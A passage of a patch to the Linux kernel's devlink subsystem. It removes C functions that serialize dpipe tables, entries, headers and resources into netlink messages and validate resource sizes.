+-	if (table->table_ops->matches_dump(table->priv, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, matches_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, matches_attr);
+-	return -EMSGSIZE;
+-}
+-
+-int devlink_dpipe_action_put(struct sk_buff *skb,
+-			     struct devlink_dpipe_action *action)
+-{
+-	struct devlink_dpipe_header *header = action->header;
+-	struct devlink_dpipe_field *field = &header->fields[action->field_id];
+-	struct nlattr *action_attr;
+-
+-	action_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ACTION);
+-	if (!action_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_ACTION_TYPE, action->type) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_INDEX, action->header_index) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, action_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, action_attr);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_action_put);
+-
+-static int devlink_dpipe_actions_put(struct devlink_dpipe_table *table,
+-				     struct sk_buff *skb)
+-{
+-	struct nlattr *actions_attr;
+-
+-	actions_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_TABLE_ACTIONS);
+-	if (!actions_attr)
+-		return -EMSGSIZE;
+-
+-	if (table->table_ops->actions_dump(table->priv, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, actions_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, actions_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_table_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_table *table)
+-{
+-	struct nlattr *table_attr;
+-	u64 table_size;
+-
+-	table_size = table->table_ops->size_get(table->priv);
+-	table_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLE);
+-	if (!table_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_TABLE_NAME, table->name) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_SIZE, table_size,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (nla_put_u8(skb, DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED,
+-		       table->counters_enabled))
+-		goto nla_put_failure;
+-
+-	if (table->resource_valid) {
+-		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_ID,
+-				      table->resource_id, DEVLINK_ATTR_PAD) ||
+-		    nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_TABLE_RESOURCE_UNITS,
+-				      table->resource_units, DEVLINK_ATTR_PAD))
+-			goto nla_put_failure;
+-	}
+-	if (devlink_dpipe_matches_put(table, skb))
+-		goto nla_put_failure;
+-
+-	if (devlink_dpipe_actions_put(table, skb))
+-		goto nla_put_failure;
+-
+-	nla_nest_end(skb, table_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, table_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_send_and_alloc_skb(struct sk_buff **pskb,
+-					    struct genl_info *info)
+-{
+-	int err;
+-
+-	if (*pskb) {
+-		err = genlmsg_reply(*pskb, info);
+-		if (err)
+-			return err;
+-	}
+-	*pskb = genlmsg_new(GENLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!*pskb)
+-		return -ENOMEM;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_tables_fill(struct genl_info *info,
+-				     enum devlink_command cmd, int flags,
+-				     struct list_head *dpipe_tables,
+-				     const char *table_name)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_dpipe_table *table;
+-	struct nlattr *tables_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	bool incomplete;
+-	void *hdr;
+-	int i;
+-	int err;
+-
+-	table = list_first_entry(dpipe_tables,
+-				 struct devlink_dpipe_table, list);
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-	tables_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_TABLES);
+-	if (!tables_attr)
+-		goto nla_put_failure;
+-
+-	i = 0;
+-	incomplete = false;
+-	list_for_each_entry_from(table, dpipe_tables, list) {
+-		if (!table_name) {
+-			err = devlink_dpipe_table_put(skb, table);
+-			if (err) {
+-				if (!i)
+-					goto err_table_put;
+-				incomplete = true;
+-				break;
+-			}
+-		} else {
+-			if (!strcmp(table->name, table_name)) {
+-				err = devlink_dpipe_table_put(skb, table);
+-				if (err)
+-					break;
+-			}
+-		}
+-		i++;
+-	}
+-
+-	nla_nest_end(skb, tables_attr);
+-	genlmsg_end(skb, hdr);
+-	if (incomplete)
+-		goto start_again;
+-
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_table_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_dpipe_table_get(struct sk_buff *skb,
+-					  struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *table_name =  NULL;
+-
+-	if (info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME])
+-		table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-
+-	return devlink_dpipe_tables_fill(info, DEVLINK_CMD_DPIPE_TABLE_GET, 0,
+-					 &devlink->dpipe_table_list,
+-					 table_name);
+-}
+-
+-static int devlink_dpipe_value_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_value *value)
+-{
+-	if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE,
+-		    value->value_size, value->value))
+-		return -EMSGSIZE;
+-	if (value->mask)
+-		if (nla_put(skb, DEVLINK_ATTR_DPIPE_VALUE_MASK,
+-			    value->value_size, value->mask))
+-			return -EMSGSIZE;
+-	if (value->mapping_valid)
+-		if (nla_put_u32(skb, DEVLINK_ATTR_DPIPE_VALUE_MAPPING,
+-				value->mapping_value))
+-			return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_action_value_put(struct sk_buff *skb,
+-					  struct devlink_dpipe_value *value)
+-{
+-	if (!value->action)
+-		return -EINVAL;
+-	if (devlink_dpipe_action_put(skb, value->action))
+-		return -EMSGSIZE;
+-	if (devlink_dpipe_value_put(skb, value))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_action_values_put(struct sk_buff *skb,
+-					   struct devlink_dpipe_value *values,
+-					   unsigned int values_count)
+-{
+-	struct nlattr *action_attr;
+-	int i;
+-	int err;
+-
+-	for (i = 0; i < values_count; i++) {
+-		action_attr = nla_nest_start_noflag(skb,
+-						    DEVLINK_ATTR_DPIPE_ACTION_VALUE);
+-		if (!action_attr)
+-			return -EMSGSIZE;
+-		err = devlink_dpipe_action_value_put(skb, &values[i]);
+-		if (err)
+-			goto err_action_value_put;
+-		nla_nest_end(skb, action_attr);
+-	}
+-	return 0;
+-
+-err_action_value_put:
+-	nla_nest_cancel(skb, action_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_match_value_put(struct sk_buff *skb,
+-					 struct devlink_dpipe_value *value)
+-{
+-	if (!value->match)
+-		return -EINVAL;
+-	if (devlink_dpipe_match_put(skb, value->match))
+-		return -EMSGSIZE;
+-	if (devlink_dpipe_value_put(skb, value))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_dpipe_match_values_put(struct sk_buff *skb,
+-					  struct devlink_dpipe_value *values,
+-					  unsigned int values_count)
+-{
+-	struct nlattr *match_attr;
+-	int i;
+-	int err;
+-
+-	for (i = 0; i < values_count; i++) {
+-		match_attr = nla_nest_start_noflag(skb,
+-						   DEVLINK_ATTR_DPIPE_MATCH_VALUE);
+-		if (!match_attr)
+-			return -EMSGSIZE;
+-		err = devlink_dpipe_match_value_put(skb, &values[i]);
+-		if (err)
+-			goto err_match_value_put;
+-		nla_nest_end(skb, match_attr);
+-	}
+-	return 0;
+-
+-err_match_value_put:
+-	nla_nest_cancel(skb, match_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_entry_put(struct sk_buff *skb,
+-				   struct devlink_dpipe_entry *entry)
+-{
+-	struct nlattr *entry_attr, *matches_attr, *actions_attr;
+-	int err;
+-
+-	entry_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_ENTRY);
+-	if (!entry_attr)
+-		return  -EMSGSIZE;
+-
+-	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_INDEX, entry->index,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (entry->counter_valid)
+-		if (nla_put_u64_64bit(skb, DEVLINK_ATTR_DPIPE_ENTRY_COUNTER,
+-				      entry->counter, DEVLINK_ATTR_PAD))
+-			goto nla_put_failure;
+-
+-	matches_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_ENTRY_MATCH_VALUES);
+-	if (!matches_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_match_values_put(skb, entry->match_values,
+-					     entry->match_values_count);
+-	if (err) {
+-		nla_nest_cancel(skb, matches_attr);
+-		goto err_match_values_put;
+-	}
+-	nla_nest_end(skb, matches_attr);
+-
+-	actions_attr = nla_nest_start_noflag(skb,
+-					     DEVLINK_ATTR_DPIPE_ENTRY_ACTION_VALUES);
+-	if (!actions_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_action_values_put(skb, entry->action_values,
+-					      entry->action_values_count);
+-	if (err) {
+-		nla_nest_cancel(skb, actions_attr);
+-		goto err_action_values_put;
+-	}
+-	nla_nest_end(skb, actions_attr);
+-
+-	nla_nest_end(skb, entry_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_match_values_put:
+-err_action_values_put:
+-	nla_nest_cancel(skb, entry_attr);
+-	return err;
+-}
+-
+-static struct devlink_dpipe_table *
+-devlink_dpipe_table_find(struct list_head *dpipe_tables,
+-			 const char *table_name, struct devlink *devlink)
+-{
+-	struct devlink_dpipe_table *table;
+-	list_for_each_entry_rcu(table, dpipe_tables, list,
+-				lockdep_is_held(&devlink->lock)) {
+-		if (!strcmp(table->name, table_name))
+-			return table;
+-	}
+-	return NULL;
+-}
+-
+-int devlink_dpipe_entry_ctx_prepare(struct devlink_dpipe_dump_ctx *dump_ctx)
+-{
+-	struct devlink *devlink;
+-	int err;
+-
+-	err = devlink_dpipe_send_and_alloc_skb(&dump_ctx->skb,
+-					       dump_ctx->info);
+-	if (err)
+-		return err;
+-
+-	dump_ctx->hdr = genlmsg_put(dump_ctx->skb,
+-				    dump_ctx->info->snd_portid,
+-				    dump_ctx->info->snd_seq,
+-				    &devlink_nl_family, NLM_F_MULTI,
+-				    dump_ctx->cmd);
+-	if (!dump_ctx->hdr)
+-		goto nla_put_failure;
+-
+-	devlink = dump_ctx->info->user_ptr[0];
+-	if (devlink_nl_put_handle(dump_ctx->skb, devlink))
+-		goto nla_put_failure;
+-	dump_ctx->nest = nla_nest_start_noflag(dump_ctx->skb,
+-					       DEVLINK_ATTR_DPIPE_ENTRIES);
+-	if (!dump_ctx->nest)
+-		goto nla_put_failure;
+-	return 0;
+-
+-nla_put_failure:
+-	nlmsg_free(dump_ctx->skb);
+-	return -EMSGSIZE;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_prepare);
+-
+-int devlink_dpipe_entry_ctx_append(struct devlink_dpipe_dump_ctx *dump_ctx,
+-				   struct devlink_dpipe_entry *entry)
+-{
+-	return devlink_dpipe_entry_put(dump_ctx->skb, entry);
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_append);
+-
+-int devlink_dpipe_entry_ctx_close(struct devlink_dpipe_dump_ctx *dump_ctx)
+-{
+-	nla_nest_end(dump_ctx->skb, dump_ctx->nest);
+-	genlmsg_end(dump_ctx->skb, dump_ctx->hdr);
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_ctx_close);
+-
+-void devlink_dpipe_entry_clear(struct devlink_dpipe_entry *entry)
+-
+-{
+-	unsigned int value_count, value_index;
+-	struct devlink_dpipe_value *value;
+-
+-	value = entry->action_values;
+-	value_count = entry->action_values_count;
+-	for (value_index = 0; value_index < value_count; value_index++) {
+-		kfree(value[value_index].value);
+-		kfree(value[value_index].mask);
+-	}
+-
+-	value = entry->match_values;
+-	value_count = entry->match_values_count;
+-	for (value_index = 0; value_index < value_count; value_index++) {
+-		kfree(value[value_index].value);
+-		kfree(value[value_index].mask);
+-	}
+-}
+-EXPORT_SYMBOL_GPL(devlink_dpipe_entry_clear);
+-
+-static int devlink_dpipe_entries_fill(struct genl_info *info,
+-				      enum devlink_command cmd, int flags,
+-				      struct devlink_dpipe_table *table)
+-{
+-	struct devlink_dpipe_dump_ctx dump_ctx;
+-	struct nlmsghdr *nlh;
+-	int err;
+-
+-	dump_ctx.skb = NULL;
+-	dump_ctx.cmd = cmd;
+-	dump_ctx.info = info;
+-
+-	err = table->table_ops->entries_dump(table->priv,
+-					     table->counters_enabled,
+-					     &dump_ctx);
+-	if (err)
+-		return err;
+-
+-send_done:
+-	nlh = nlmsg_put(dump_ctx.skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&dump_ctx.skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(dump_ctx.skb, info);
+-}
+-
+-static int devlink_nl_cmd_dpipe_entries_get(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_dpipe_table *table;
+-	const char *table_name;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME))
+-		return -EINVAL;
+-
+-	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	if (!table->table_ops->entries_dump)
+-		return -EINVAL;
+-
+-	return devlink_dpipe_entries_fill(info, DEVLINK_CMD_DPIPE_ENTRIES_GET,
+-					  0, table);
+-}
+-
+-static int devlink_dpipe_fields_put(struct sk_buff *skb,
+-				    const struct devlink_dpipe_header *header)
+-{
+-	struct devlink_dpipe_field *field;
+-	struct nlattr *field_attr;
+-	int i;
+-
+-	for (i = 0; i < header->fields_count; i++) {
+-		field = &header->fields[i];
+-		field_attr = nla_nest_start_noflag(skb,
+-						   DEVLINK_ATTR_DPIPE_FIELD);
+-		if (!field_attr)
+-			return -EMSGSIZE;
+-		if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_FIELD_NAME, field->name) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_ID, field->id) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_BITWIDTH, field->bitwidth) ||
+-		    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_FIELD_MAPPING_TYPE, field->mapping_type))
+-			goto nla_put_failure;
+-		nla_nest_end(skb, field_attr);
+-	}
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(skb, field_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_dpipe_header_put(struct sk_buff *skb,
+-				    struct devlink_dpipe_header *header)
+-{
+-	struct nlattr *fields_attr, *header_attr;
+-	int err;
+-
+-	header_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADER);
+-	if (!header_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_DPIPE_HEADER_NAME, header->name) ||
+-	    nla_put_u32(skb, DEVLINK_ATTR_DPIPE_HEADER_ID, header->id) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_DPIPE_HEADER_GLOBAL, header->global))
+-		goto nla_put_failure;
+-
+-	fields_attr = nla_nest_start_noflag(skb,
+-					    DEVLINK_ATTR_DPIPE_HEADER_FIELDS);
+-	if (!fields_attr)
+-		goto nla_put_failure;
+-
+-	err = devlink_dpipe_fields_put(skb, header);
+-	if (err) {
+-		nla_nest_cancel(skb, fields_attr);
+-		goto nla_put_failure;
+-	}
+-	nla_nest_end(skb, fields_attr);
+-	nla_nest_end(skb, header_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-	nla_nest_cancel(skb, header_attr);
+-	return err;
+-}
+-
+-static int devlink_dpipe_headers_fill(struct genl_info *info,
+-				      enum devlink_command cmd, int flags,
+-				      struct devlink_dpipe_headers *
+-				      dpipe_headers)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct nlattr *headers_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	void *hdr;
+-	int i, j;
+-	int err;
+-
+-	i = 0;
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-	headers_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_DPIPE_HEADERS);
+-	if (!headers_attr)
+-		goto nla_put_failure;
+-
+-	j = 0;
+-	for (; i < dpipe_headers->headers_count; i++) {
+-		err = devlink_dpipe_header_put(skb, dpipe_headers->headers[i]);
+-		if (err) {
+-			if (!j)
+-				goto err_table_put;
+-			break;
+-		}
+-		j++;
+-	}
+-	nla_nest_end(skb, headers_attr);
+-	genlmsg_end(skb, hdr);
+-	if (i != dpipe_headers->headers_count)
+-		goto start_again;
+-
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_table_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_dpipe_headers_get(struct sk_buff *skb,
+-					    struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (!devlink->dpipe_headers)
+-		return -EOPNOTSUPP;
+-	return devlink_dpipe_headers_fill(info, DEVLINK_CMD_DPIPE_HEADERS_GET,
+-					  0, devlink->dpipe_headers);
+-}
+-
+-static int devlink_dpipe_table_counters_set(struct devlink *devlink,
+-					    const char *table_name,
+-					    bool enable)
+-{
+-	struct devlink_dpipe_table *table;
+-
+-	table = devlink_dpipe_table_find(&devlink->dpipe_table_list,
+-					 table_name, devlink);
+-	if (!table)
+-		return -EINVAL;
+-
+-	if (table->counter_control_extern)
+-		return -EOPNOTSUPP;
+-
+-	if (!(table->counters_enabled ^ enable))
+-		return 0;
+-
+-	table->counters_enabled = enable;
+-	if (table->table_ops->counters_set_update)
+-		table->table_ops->counters_set_update(table->priv, enable);
+-	return 0;
+-}
+-
+-static int devlink_nl_cmd_dpipe_table_counters_set(struct sk_buff *skb,
+-						   struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	const char *table_name;
+-	bool counters_enable;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_DPIPE_TABLE_NAME) ||
+-	    GENL_REQ_ATTR_CHECK(info,
+-				DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED))
+-		return -EINVAL;
+-
+-	table_name = nla_data(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_NAME]);
+-	counters_enable = !!nla_get_u8(info->attrs[DEVLINK_ATTR_DPIPE_TABLE_COUNTERS_ENABLED]);
+-
+-	return devlink_dpipe_table_counters_set(devlink, table_name,
+-						counters_enable);
+-}
+-
+-static struct devlink_resource *
+-devlink_resource_find(struct devlink *devlink,
+-		      struct devlink_resource *resource, u64 resource_id)
+-{
+-	struct list_head *resource_list;
+-
+-	if (resource)
+-		resource_list = &resource->resource_list;
+-	else
+-		resource_list = &devlink->resource_list;
+-
+-	list_for_each_entry(resource, resource_list, list) {
+-		struct devlink_resource *child_resource;
+-
+-		if (resource->id == resource_id)
+-			return resource;
+-
+-		child_resource = devlink_resource_find(devlink, resource,
+-						       resource_id);
+-		if (child_resource)
+-			return child_resource;
+-	}
+-	return NULL;
+-}
+-
+-static void
+-devlink_resource_validate_children(struct devlink_resource *resource)
+-{
+-	struct devlink_resource *child_resource;
+-	bool size_valid = true;
+-	u64 parts_size = 0;
+-
+-	if (list_empty(&resource->resource_list))
+-		goto out;
+-
+-	list_for_each_entry(child_resource, &resource->resource_list, list)
+-		parts_size += child_resource->size_new;
+-
+-	if (parts_size > resource->size_new)
+-		size_valid = false;
+-out:
+-	resource->size_valid = size_valid;
+-}
+-
+-static int
+-devlink_resource_validate_size(struct devlink_resource *resource, u64 size,
+-			       struct netlink_ext_ack *extack)
+-{
+-	u64 reminder;
+-	int err = 0;
+-
+-	if (size > resource->size_params.size_max) {
+-		NL_SET_ERR_MSG_MOD(extack, "Size larger than maximum");
+-		err = -EINVAL;
+-	}
+-
+-	if (size < resource->size_params.size_min) {
+-		NL_SET_ERR_MSG_MOD(extack, "Size smaller than minimum");
+-		err = -EINVAL;
+-	}
+-
+-	div64_u64_rem(size, resource->size_params.size_granularity, &reminder);
+-	if (reminder) {
+-		NL_SET_ERR_MSG_MOD(extack, "Wrong granularity");
+-		err = -EINVAL;
+-	}
+-
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_resource_set(struct sk_buff *skb,
+-				       struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_resource *resource;
+-	u64 resource_id;
+-	u64 size;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_ID) ||
+-	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_RESOURCE_SIZE))
+-		return -EINVAL;
+-	resource_id = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_ID]);
+-
+-	resource = devlink_resource_find(devlink, NULL, resource_id);
+-	if (!resource)
+-		return -EINVAL;
+-
+-	size = nla_get_u64(info->attrs[DEVLINK_ATTR_RESOURCE_SIZE]);
+-	err = devlink_resource_validate_size(resource, size, info->extack);
+-	if (err)
+-		return err;
+-
+-	resource->size_new = size;
+-	devlink_resource_validate_children(resource);
+-	if (resource->parent)
+-		devlink_resource_validate_children(resource->parent);
+-	return 0;
+-}
+-
+-static int
+-devlink_resource_size_params_put(struct devlink_resource *resource,
+-				 struct sk_buff *skb)
+-{
+-	struct devlink_resource_size_params *size_params;
+-
+-	size_params = &resource->size_params;
+-	if (nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_GRAN,
+-			      size_params->size_granularity, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MAX,
+-			      size_params->size_max, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_MIN,
+-			      size_params->size_min, DEVLINK_ATTR_PAD) ||
+-	    nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_UNIT, size_params->unit))
+-		return -EMSGSIZE;
+-	return 0;
+-}
+-
+-static int devlink_resource_occ_put(struct devlink_resource *resource,
+-				    struct sk_buff *skb)
+-{
+-	if (!resource->occ_get)
+-		return 0;
+-	return nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_OCC,
+-				 resource->occ_get(resource->occ_get_priv),
+-				 DEVLINK_ATTR_PAD);
+-}
+-
+-static int devlink_resource_put(struct devlink *devlink, struct sk_buff *skb,
+-				struct devlink_resource *resource)
+-{
+-	struct devlink_resource *child_resource;
+-	struct nlattr *child_resource_attr;
+-	struct nlattr *resource_attr;
+-
+-	resource_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_RESOURCE);
+-	if (!resource_attr)
+-		return -EMSGSIZE;
+-
+-	if (nla_put_string(skb, DEVLINK_ATTR_RESOURCE_NAME, resource->name) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE, resource->size,
+-			      DEVLINK_ATTR_PAD) ||
+-	    nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_ID, resource->id,
+-			      DEVLINK_ATTR_PAD))
+-		goto nla_put_failure;
+-	if (resource->size != resource->size_new)
+-		nla_put_u64_64bit(skb, DEVLINK_ATTR_RESOURCE_SIZE_NEW,
+-				  resource->size_new, DEVLINK_ATTR_PAD);
+-	if (devlink_resource_occ_put(resource, skb))
+-		goto nla_put_failure;
+-	if (devlink_resource_size_params_put(resource, skb))
+-		goto nla_put_failure;
+-	if (list_empty(&resource->resource_list))
+-		goto out;
+-
+-	if (nla_put_u8(skb, DEVLINK_ATTR_RESOURCE_SIZE_VALID,
+-		       resource->size_valid))
+-		goto nla_put_failure;
+-
+-	child_resource_attr = nla_nest_start_noflag(skb,
+-						    DEVLINK_ATTR_RESOURCE_LIST);
+-	if (!child_resource_attr)
+-		goto nla_put_failure;
+-
+-	list_for_each_entry(child_resource, &resource->resource_list, list) {
+-		if (devlink_resource_put(devlink, skb, child_resource))
+-			goto resource_put_failure;
+-	}
+-
+-	nla_nest_end(skb, child_resource_attr);
+-out:
+-	nla_nest_end(skb, resource_attr);
+-	return 0;
+-
+-resource_put_failure:
+-	nla_nest_cancel(skb, child_resource_attr);
+-nla_put_failure:
+-	nla_nest_cancel(skb, resource_attr);
+-	return -EMSGSIZE;
+-}
+-
+-static int devlink_resource_fill(struct genl_info *info,
+-				 enum devlink_command cmd, int flags)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_resource *resource;
+-	struct nlattr *resources_attr;
+-	struct sk_buff *skb = NULL;
+-	struct nlmsghdr *nlh;
+-	bool incomplete;
+-	void *hdr;
+-	int i;
+-	int err;
+-
+-	resource = list_first_entry(&devlink->resource_list,
+-				    struct devlink_resource, list);
+-start_again:
+-	err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-	if (err)
+-		return err;
+-
+-	hdr = genlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			  &devlink_nl_family, NLM_F_MULTI, cmd);
+-	if (!hdr) {
+-		nlmsg_free(skb);
+-		return -EMSGSIZE;
+-	}
+-
+-	if (devlink_nl_put_handle(skb, devlink))
+-		goto nla_put_failure;
+-
+-	resources_attr = nla_nest_start_noflag(skb,
+-					       DEVLINK_ATTR_RESOURCE_LIST);
+-	if (!resources_attr)
+-		goto nla_put_failure;
+-
+-	incomplete = false;
+-	i = 0;
+-	list_for_each_entry_from(resource, &devlink->resource_list, list) {
+-		err = devlink_resource_put(devlink, skb, resource);
+-		if (err) {
+-			if (!i)
+-				goto err_resource_put;
+-			incomplete = true;
+-			break;
+-		}
+-		i++;
+-	}
+-	nla_nest_end(skb, resources_attr);
+-	genlmsg_end(skb, hdr);
+-	if (incomplete)
+-		goto start_again;
+-send_done:
+-	nlh = nlmsg_put(skb, info->snd_portid, info->snd_seq,
+-			NLMSG_DONE, 0, flags | NLM_F_MULTI);
+-	if (!nlh) {
+-		err = devlink_dpipe_send_and_alloc_skb(&skb, info);
+-		if (err)
+-			return err;
+-		goto send_done;
+-	}
+-	return genlmsg_reply(skb, info);
+-
+-nla_put_failure:
+-	err = -EMSGSIZE;
+-err_resource_put:
+-	nlmsg_free(skb);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_resource_dump(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-
+-	if (list_empty(&devlink->resource_list))
+-		return -EOPNOTSUPP;
+-
+-	return devlink_resource_fill(info, DEVLINK_CMD_RESOURCE_DUMP, 0);
+-}
+-
+-static int
+-devlink_resources_validate(struct devlink *devlink,
+-			   struct devlink_resource *resource,
+-			   struct genl_info *info)
+-{
+-	struct list_head *resource_list;
+-	int err = 0;
+-
+-	if (resource)
+-		resource_list = &resource->resource_list;
+-	else
+-		resource_list = &devlink->resource_list;
+-
